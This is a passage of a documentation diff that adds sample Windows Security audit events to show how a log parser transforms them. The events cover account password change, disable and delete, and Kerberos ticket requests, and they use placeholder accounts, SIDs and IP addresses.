Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } + + ``` + + +=== "security_event_4725.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042691344", + "task": "User Account Management" + } + } + + ``` + + +=== "security_event_4726.json" + + ```json + + { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { "user": [ - "HOST01" + "doe.j" ] }, "user": { - "domain": "COMPANY", - "effective": { - "domain": "-", - "id": "S-1-0-0", - "name": "-" - }, - "id": "S-1-1-1", - "name": "HOST01", + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", "target": { - "domain": "-", - "name": "-" + "domain": "DOMAIN", + "name": "smithee.a" } }, "winlog": { "api": "wineventlog", "channel": "Security", - "computer_name": "HOST01.company.test", - "event_id": "4688", - "keywords": [ - "Audit Success" - ], + "computer_name": "hostname.domain.net", + "event_id": "4726", "logon": { - "id": "0x3e7" + "id": "0x3005c1f76" }, - "opcode": "Info", "process": { - "pid": 4, + "pid": 632, "thread": { - "id": 17028 + "id": 2056 } }, "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "provider_name": "Microsoft-Windows-Security-Auditing", - "record_id": "8884538", - "task": "Process Creation", - "version": 2 + "record_id": "25349190364", + "task": "User Account Management" } } @@ -2310,6 +3547,203 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "security_event_4768.json" + + ```json + + { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": "security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } + + ``` + + +=== "security_event_4769.json" + + ```json + + { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": 